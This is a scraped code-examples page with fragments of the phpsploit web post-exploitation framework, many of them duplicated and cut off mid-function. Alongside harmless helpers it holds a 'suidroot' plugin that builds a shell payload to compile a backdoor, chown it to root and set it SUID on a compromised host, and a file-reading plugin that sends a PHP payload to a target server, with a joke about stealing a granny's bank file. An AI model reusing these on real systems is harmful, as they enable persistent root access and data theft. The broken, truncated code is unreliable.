Ejemplo n.º 1
    def read(self, bin_mode=False):
        """Read path file contents.

        This method actually returns a string formatted for
        the current platform.
        It means that a file contents which uses '\r\n' line
        separators will be returned with '\n' separators
        instead, if it is opened through a GNU/Linux system.

        If you want to read data rawly, without newline treatment
        as mentionned above, the bin_mode optionnal argument
        should be set to True, in which case a bytes() buffer
        containing file data is returned instead of str().

        if not bin_mode:
                lines = self.readlines()
                data = os.linesep.join(lines)
                return data
            except UnicodeDecodeError:
                bytestring = self.read(bin_mode=True)
                return encoding.decode(bytestring)
        elif bin_mode:
            return open(self, 'rb').read()
Ejemplo n.º 2
def py2php(python_var):
    """Convert a python object into php serialized code string.
    serialized = phpserialize.dumps(python_var,
    serialized = encoding.decode(serialized)
    encoded = Encode(serialized).php_loader()
    raw_php_var = 'unserialize(%s)' % encoded
    return raw_php_var
Ejemplo n.º 3
def py2php(python_var):
    """Convert a python object into php serialized code string.
    serialized = phpserialize.dumps(python_var,
    serialized = encoding.decode(serialized)
    encoded = Encode(serialized).php_loader()
    raw_php_var = 'unserialize(%s)' % encoded
    return raw_php_var
Ejemplo n.º 4
    def do_corectl(self, argv):
        """Advanced core debugging utils

            corectl <TOOL>


            Print the full track trace of last python exception.

            Error messages (lines that starts with a `[!]` red tag)
            are generated by a thrown exception.
            The `stack-traceback` tool displays the full python
            stack trace of the last thrown exception.
            This command is useful for debugging purposes.

            NOTE: stack traceback is NOT saved in session files

            Reload all phpsploit plugins.

            By default, the list of phpsploit plugins is loaded
            once only, when the framework starts.
            Therefore, plugin developpers may want to reload
            the plugins in order to be able to test their
            plugin modifications without having to restart the
            framework each time.

            Run a python interpreter.

            The python console interpreter is a good gateway
            for deep debugging, or to get help about a phpsploit
            module, class, object, such as the plugin developpers
            For help with the API, run the following commands inside
            of the python console:
            >>> import api
            >>> help(api)

            Display HTTP(s) request(s) for debugging

            Shows all HTTP(s) request(s) that where sent in the last
            remote command execution.

            NOTE: http requests are NOT saved in session files
            WARNING: don't works with HTTPS requests (see issue #29 on github)

        if argv[1] == "stack-traceback":
                e = self.last_exception
                e = traceback.format_exception(type(e), e, e.__traceback__)
                # a small patch for traceback from plugins, remove trash lines
                for index, line in enumerate(e):
                    if ('File "<frozen importlib._bootstrap>"' in line
                            and '_call_with_frames_removed' in line):
                        e = e[(index + 1):]
                        header = "Traceback (most recent call last):"
                        e.insert(0, header + os.linesep)
                e = colorize("%Red", "".join(e))
                e = "[-] Exception stack is empty"

        elif argv[1] == "reload-plugins":

        elif argv[1] == "python-console":
            import ui.console
            console = ui.console.Console()
            console.banner = "Phpsploit corectl: python console interpreter"

        elif argv[1] == "display-http-requests":
            requests = enumerate(tunnel.get_raw_requests(), 1)
            if not requests:
                print("[-] No HTTP(s) requests were sent up to now")
            for num, request in requests:
                print("#" * 78)
                print("### REQUEST %d" % num)
                print("#" * 78)
            self.interpret("help corectl")
Ejemplo n.º 5
    > cat "C:\Users\granny\Desktop\bank account.TXT"
      - Don't be evil with grannies!
      - As gannies use spaces in file names, the path
        must be quoted to be parsed as a single argument.

    nil0x42 <http://goo.gl/kb2wf>

import sys
import base64

from core import encoding

from api import plugin
from api import server

if len(plugin.argv) != 2:

relative_path = plugin.argv[1]
absolute_path = server.path.abspath(relative_path)

payload = server.payload.Payload("payload.php")
payload['FILE'] = absolute_path

response = payload.send()

data = encoding.decode(base64.b64decode(response))
Ejemplo n.º 6
Archivo: plugin.py Proyecto: mmg1/omega
    sys.exit("Plugin available on unix-based platforms only")

if len(plugin.argv) < 2:

if plugin.argv[1] == '--create':
    if len(plugin.argv) != 3:

    payload_file = server.path.abspath(plugin.argv[2])

    # create the payload that must be run as privileged used.
    # The suidroot payload is then created with suid byte
    # enabled, making tunnel available.
    file = open(os.path.join(plugin.path, "payload.c"), 'rb')
    source_code = encoding.decode(base64.b64encode(file.read()))
    payload = ("echo %b | python -m base64 -d | gcc -o %f -x c -;"
               "chown root %f;"
               "chmod 4755 %f;"
               ).replace('%f', payload_file).replace('%b', source_code)

    # prevent previous configuration override
    if SUIDROOT_ENV_VARS.issubset(set(environ)):
        msg = "suidroot environment variables already set. override them ?"
        if ui.input.Expect(False, skip_interrupt=False)(msg):
            sys.exit("Operation canceled")

    print("[*] In order to use suidroot privileged command execution, "
          "run the following shell payload AS ROOT on the remote system:")
    print(ui.color.colorize("\n", "%Blue", payload, "\n"))
Ejemplo n.º 7
    def do_corectl(self, argv):
        """Advanced core debugging utils

            corectl <TOOL>


            Print the full track trace of last python exception.

            Error messages (lines that starts with a `[!]` red tag)
            are generated by a thrown exception.
            The `stack-traceback` tool displays the full python
            stack trace of the last thrown exception.
            This command is useful for debugging purposes.

            NOTE: stack traceback is NOT saved in session files

            Reload all phpsploit plugins.

            By default, the list of phpsploit plugins is loaded
            once only, when the framework starts.
            Therefore, plugin developpers may want to reload
            the plugins in order to be able to test their
            plugin modifications without having to restart the
            framework each time.

            Run a python interpreter.

            The python console interpreter is a good gateway
            for deep debugging, or to get help about a phpsploit
            module, class, object, such as the plugin developpers
            For help with the API, run the following commands inside
            of the python console:
            >>> import api
            >>> help(api)

            Display HTTP(s) request(s) for debugging

            Shows all HTTP(s) request(s) that where sent in the last
            remote command execution.

            NOTE: http requests are NOT saved in session files
            WARNING: don't works with HTTPS requests (see issue #29 on github)

        if argv[1] == "stack-traceback":
                e = self.last_exception
                e = traceback.format_exception(type(e), e, e.__traceback__)
                # a small patch for traceback from plugins, remove trash lines
                for index, line in enumerate(e):
                    if ('File "<frozen importlib._bootstrap>"' in line
                            and '_call_with_frames_removed' in line):
                        e = e[(index + 1):]
                        header = "Traceback (most recent call last):"
                        e.insert(0, header + os.linesep)
                e = colorize("%Red", "".join(e))
                e = "[-] Exception stack is empty"

        elif argv[1] == "reload-plugins":

        elif argv[1] == "python-console":
            import ui.console
            console = ui.console.Console()
            console.banner = "Phpsploit corectl: python console interpreter"

        elif argv[1] == "display-http-requests":
            requests = enumerate(tunnel.get_raw_requests(), 1)
            if not requests:
                print("[-] No HTTP(s) requests were sent up to now")
            for num, request in requests:
                print("#" * 78)
                print("### REQUEST %d" % num)
                print("#" * 78)
            self.interpret("help corectl")
Ejemplo n.º 8
    def do_corectl(self, argv):
        """Advanced core debugging utils

            corectl <TOOL>


            Print the full track trace of last python exception.

            Error messages (lines that starts with a `[!]` red tag)
            are generated by a thrown exception.
            The `stack-traceback` tool displays the full python
            stack trace of the last thrown exception.
            This command is useful for debugging purposes.

            NOTE: stack traceback is NOT saved in session files

            Reload all phpsploit plugins.

            By default, the list of phpsploit plugins is loaded
            once only, when the framework starts.
            Therefore, plugin developpers may want to reload
            the plugins in order to be able to test their
            plugin modifications without having to restart the
            framework each time.

            Run a python interpreter.

            The python console interpreter is a good gateway for deep
            debugging, or to get help about a phpsploit module, class,
            object, such as the plugin developpers API.

            For help with the API, run the following commands inside
            the python console:
            >>> import api
            >>> help(api)

            Display HTTP(s) request(s) for debugging

            Shows all HTTP(s) request(s) that where sent in the last
            remote command execution.

            NOTE: http requests are NOT saved in session files
            WARNING: don't works with HTTPS requests (see issue #29 on github)

        if argv[1] == "stack-traceback":
            if not self.last_exception:
                print("[-] Exception stack is empty")
                return False
            for line in self.last_exception:
                print(colorize("%Red", line))
            return True

        if argv[1] == "reload-plugins":
            return plugins.reload(verbose=True)

        if argv[1] == "python-console":
            from ui import console
            console = console.Console()
            console.banner = "Phpsploit corectl: python console interpreter"
            return console()

        if argv[1] == "display-http-requests":
            requests = tunnel.get_raw_requests()
            if not requests:
                print("[-] From now, phpsploit didn't "
                      "sent any HTTP(s) request")
                return False
            print("[*] Listing last payload's HTTP(s) requests:\n")
            for num, request in enumerate(requests, 1):
                print("#" * 78)
                print("### REQUEST %d" % num)
                print("#" * 78)
            return True

        self.interpret("help corectl")
        return False
Ejemplo n.º 9
    def do_corectl(self, argv):
        """Advanced core debugging utils

            corectl <TOOL>


            Print the full track trace of last python exception.

            Error messages (lines that starts with a `[!]` red tag)
            are generated by a thrown exception.
            The `stack-traceback` tool displays the full python
            stack trace of the last thrown exception.
            This command is useful for debugging purposes.

            NOTE: stack traceback is NOT saved in session files

            Reload all phpsploit plugins.

            By default, the list of phpsploit plugins is loaded
            once only, when the framework starts.
            Therefore, plugin developpers may want to reload
            the plugins in order to be able to test their
            plugin modifications without having to restart the
            framework each time.

            Run a python interpreter.

            The python console interpreter is a good gateway for deep
            debugging, or to get help about a phpsploit module, class,
            object, such as the plugin developpers API.

            For help with the API, run the following commands inside
            the python console:
            >>> import api
            >>> help(api)

            Display HTTP(s) request(s) for debugging

            Shows all HTTP(s) request(s) that were sent in the last
            remote command execution.

            NOTE: http requests are NOT saved in session files
            WARNING: don't works with HTTPS requests (see issue #29 on github)

        if argv[1] == "stack-traceback":
            if not self.last_exception:
                print("[-] Exception stack is empty")
                return False
            for line in self.last_exception:
                print(colorize("%Red", line))
            return True

        if argv[1] == "reload-plugins":
            return plugins.reload(verbose=True)

        if argv[1] == "python-console":
            from ui import console
            console = console.Console()
            console.banner = "Phpsploit corectl: python console interpreter"
            return console()

        if argv[1] == "display-http-requests":
            requests = tunnel.get_raw_requests()
            if not requests:
                print("[-] From now, phpsploit didn't "
                      "sent any HTTP(s) request")
                return False
            print("[*] Listing last payload's HTTP(s) requests:\n")
            for num, request in enumerate(requests, 1):
                print("#" * 78)
                print("### REQUEST %d" % num)
                print("#" * 78)
            return True

        self.interpret("help corectl")
        return False
Ejemplo n.º 10
    sys.exit("Plugin available on unix-based platforms only")

if len(plugin.argv) < 2:

if plugin.argv[1] == '--create':
    if len(plugin.argv) != 3:

    backdoor_file = server.path.abspath(plugin.argv[2])

    # create the payload that must be run as privileged used.
    # The suidroot backdoor is then created with suid byte
    # enabled, making tunnel available.
    file = open(os.path.join(plugin.path, "backdoor.c"), 'rb')
    source_code = encoding.decode(base64.b64encode(file.read()))
    payload = ("echo %b | python -m base64 -d | gcc -o %f -x c -;"
               "chown root %f;"
               "chmod 4755 %f;"
               ).replace('%f', backdoor_file).replace('%b', source_code)

    # prevent previous configuration override
    if SUIDROOT_ENV_VARS.issubset(set(environ)):
        msg = "suidroot environment variables already set. override them ?"
        if ui.input.Expect(False, skip_interrupt=False)(msg):
            sys.exit("Operation canceled")

    print("[*] In order to use suidroot privileged command execution, "
          "run the following shell payload AS ROOT on the remote system:")
    print(ui.color.colorize("\n", "%Blue", payload, "\n"))
Ejemplo n.º 11
      - Don't be evil with grannies!
        NOTE: since gannies use spaces in file names, the path
        string must be enquoted to be considered as a single

    nil0x42 <http://goo.gl/kb2wf>

import sys
import base64

from core import encoding

from api import plugin
from api import server

if len(plugin.argv) != 2:

relative_path = plugin.argv[1]
absolute_path = server.path.abspath(relative_path)

payload = server.payload.Payload("payload.php")
payload['FILE'] = absolute_path

response = payload.send()

data = encoding.decode(base64.b64decode(response))